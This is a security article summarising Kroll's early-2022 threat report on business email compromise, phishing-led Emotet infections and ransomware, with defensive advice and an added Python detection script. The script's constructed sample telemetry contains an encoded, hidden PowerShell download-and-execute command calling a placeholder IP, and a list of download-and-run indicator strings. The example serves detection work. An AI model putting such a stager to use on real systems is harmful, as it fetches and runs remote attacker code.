Cyberthreats 2022: What we know so far
As ransomware attacks wane, phishing continues to be the weapon of choice for system access.
The key to any robust cyber defense strategy involves two things: insight into your own vulnerabilities and insight into evolving adversary tactics. Only then can you build defenses that align with how attackers actually operate. A report by Kroll, a U.S. provider of technology and insights related to risk and governance, finds that the threat environment remains complex, and that attackers are increasingly targeting email for both initial access and extortion.
Following is a high-level summary of their findings.
Business email compromise attacks rising, ransomware slowing down
Business email compromise (BEC), a highly targeted form of corporate phishing, and ransomware remain the top two incident types, but their trajectories have diverged: ransomware slipped 30% from the previous quarter, while BEC rose nearly 19% compared with Q4 2021. The report also states that BEC is playing an increasingly important role in the intrusion lifecycle of cyber extortion attacks.
In one such case, attackers sent phishing emails to the IT departments of targeted businesses. Recipients clicked the malicious link and entered their credentials on the attacker's page. Once administrative credentials were harvested, the attackers used them to log in and take over email accounts belonging to senior IT staff and C-level executives.
They then persisted in the environment, downloading email attachments and data from OneDrive and SharePoint. Using the compromised accounts, the attackers contacted the account holders by text message and email with ransom notes demanding payment to end the attack. In some cases they also hijacked social media accounts to add pressure on the victims to pay.
Phishing is actively used for initial access
In Q1 2022, phishing as a means of gaining initial access rose 54%, leaving it well ahead of other leading initial-access vectors such as zero-day exploits and third-party vulnerabilities. Kroll researchers believe the increase may be driven by campaigns from the operators of the Emotet and IcedID malware families, who continually look for ways to get into organizations without being detected. The report highlights a case in which an email chain between a third party and an employee led the victim to download a malicious .zip archive containing an Excel document with macros; when the macros ran, they launched PowerShell, Microsoft's command-line shell and scripting engine, to carry out the next stage of the attack. An endpoint detection and response (EDR) tool blocked the Emotet payload on the first machine. However, the email was then forwarded internally, and other recipients opened it, which led to multiple infections.
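The macro-to-PowerShell chain described above is a reliable detection opportunity: Excel or Word should almost never be the parent process of powershell.exe, cmd.exe or other script hosts. As an added example (not from the Kroll report or this article), the Python script below checks constructed Sysmon-style process-creation records for an Office application spawning a script host and decodes any PowerShell -EncodedCommand argument so the analyst sees what the macro actually tried to run. The field names (Image, ParentImage, CommandLine, Computer, User), host and user names, and the stage-two URL are assumed sample values, not data from any real incident.

```python
"""Flag Office applications spawning script hosts in process-creation telemetry.

Added example: the records are constructed Sysmon Event ID 1-style JSON lines,
not real log data, and every host, user and URL below is an assumed sample value.
"""
import base64
import json
import re
from typing import Dict, List, Optional

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Substrings that usually mean "download and run something" when found in a command line.
SUSPICIOUS_TOKENS = ("iex", "invoke-expression", "downloadstring", "downloadfile",
                     "http://", "https://", "frombase64string")

# PowerShell accepts -e, -ec, -enc and -EncodedCommand, followed by the base64 payload.
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/]+=*)", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-case file name from a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None if absent/invalid."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        # PowerShell encodes the script as UTF-16LE before base64-encoding it.
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: Dict) -> Optional[Dict]:
    """Produce a finding when an Office app is the parent of a script host, else None."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return None
    cmdline = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    # Search both the raw command line and the decoded payload for download-and-execute patterns.
    haystack = (cmdline + " " + (decoded or "")).lower()
    indicators = [token for token in SUSPICIOUS_TOKENS if token in haystack]
    return {
        "rule": "office_app_spawned_script_host",
        "host": event.get("Computer"),
        "user": event.get("User"),
        "chain": f"{parent} -> {child}",
        "decoded_command": decoded,
        "indicators": indicators,
        # Any encoded or download-style command is high; a bare script host under Office is medium.
        "severity": "high" if (decoded or indicators) else "medium",
    }


def scan(jsonl: str) -> List[Dict]:
    """Run analyze_event over newline-delimited JSON records, skipping blank or malformed lines."""
    findings = []
    for line in jsonl.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        finding = analyze_event(event)
        if finding:
            findings.append(finding)
    return findings


def encode_powershell(script: str) -> str:
    """Mirror PowerShell's -EncodedCommand format (UTF-16LE, then base64); used only to build the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry; the stage-two URL uses a documentation-range address.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/x')"
SAMPLE_EVENTS = "\n".join([
    json.dumps({"Computer": "WS-FIN-07", "User": "CORP\\jdoe",
                "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE",
                "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                "CommandLine": f"powershell.exe -nop -w hidden -enc {encode_powershell(STAGE2)}"}),
    json.dumps({"Computer": "WS-FIN-07", "User": "CORP\\jdoe",  # benign print helper under Excel
                "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE",
                "Image": "C:\\Windows\\splwow64.exe",
                "CommandLine": "C:\\Windows\\splwow64.exe 12288"}),
    json.dumps({"Computer": "WS-ENG-02", "User": "CORP\\asmith",  # user-launched, parent is not Office
                "ParentImage": "C:\\Windows\\explorer.exe",
                "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                "CommandLine": "powershell.exe -File C:\\scripts\\backup.ps1"}),
    json.dumps({"Computer": "WS-HR-11", "User": "CORP\\mlee",
                "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
                "Image": "C:\\Windows\\System32\\cmd.exe",
                "CommandLine": "cmd.exe /c echo hello"}),
])

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(json.dumps(finding, indent=2))
```

Run as-is, the script reports two findings: the Excel-to-PowerShell event is rated high because the decoded command downloads and executes remote code, and the Word-to-cmd.exe event is rated medium and deserves a look. The benign splwow64.exe child of Excel and the user-launched PowerShell under explorer.exe produce no alert. The same parent/child logic maps directly onto an EDR or SIEM rule, and decoding the encoded command is what turns an opaque alert into something an analyst can triage quickly.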
Ransomware actors are leveraging vulnerabilities
While ransomware activity slowed in Q1 2022, ransomware incidents still accounted for 32% of all observed cases. The frequency of Conti attacks dropped nearly 43% from the previous quarter, but other strains such as LockBit 2.0, AvosLocker, QuantumLocker and Ragnar Locker showed increased activity. Kroll also reports that ransomware groups continue to exploit known, patchable vulnerabilities such as ProxyShell in Microsoft Exchange and Log4Shell in Apache Log4j to gain initial access to target networks. Manufacturing was reportedly hit hardest: 68% of incidents in that sector were ransomware, and the sector saw a 33% increase in cyber incidents over the previous quarter.
What organizations can do to protect themselves
Phishing, along with its variants such as spear phishing and BEC, remains the most common root cause of cyberattacks. Unpatched software is another leading root cause. Organizations that focus on these two aspects and design defenses around them will be in much better shape against the bulk of attacks. Here are some security best practices that can help:
- Develop a security culture for employees: Train employees regularly via real-world examples, phishing simulations, classroom training and tabletop exercises. Repeated security awareness training will help them build muscle memory so that they can identify suspicious activity and report it to security teams.
- Perform software patching regularly: Maintain a process that keeps operating systems, applications and internet-facing services up to date, prioritizing vulnerabilities known to be exploited in the wild, such as the ProxyShell and Log4j flaws ransomware groups are using for initial access.
- Deploy multi-factor authentication: MFA blocks the large majority of automated account-compromise attempts; if credentials are phished, leaked or purchased on the dark web, the attacker still lacks the second factor. Note that weaker factors such as SMS codes and push approvals can be defeated by real-time phishing proxies and push fatigue, so prefer phishing-resistant methods such as FIDO2 security keys, especially for administrators and executives, the accounts targeted in the BEC case above.
- Use a defense-in-depth approach: Defense-in-depth is a layered security approach that combines three main things: user awareness (coaching users on password hygiene and phishing tactics); policies and procedures (documenting do's and don'ts, best practices and incident response procedures); and technical controls (timely patching, privileged access management, account hygiene, endpoint detection and response software, firewalls, intrusion detection systems and other technologies).
As we look for the best ways to position our cybersecurity strategy, it is important to remember that while tactics evolve, root causes stay the same. If security teams focus on addressing the root causes rather than being distracted by the symptoms (ransomware is a symptom; how the ransomware got in is the root cause), attackers will have no choice but to move on to the next target.
Stu Sjouwerman is founder and CEO of KnowBe4, [NASDAQ: KNBE] developer of security awareness training and simulated phishing platforms. He was co-founder of Sunbelt Software, the anti-malware software company acquired in 2010. He is the author of four books, including “Cyberheist: The Biggest Financial Threat Facing American Businesses.” Contact him at ssjouwerman@knowbe4.com.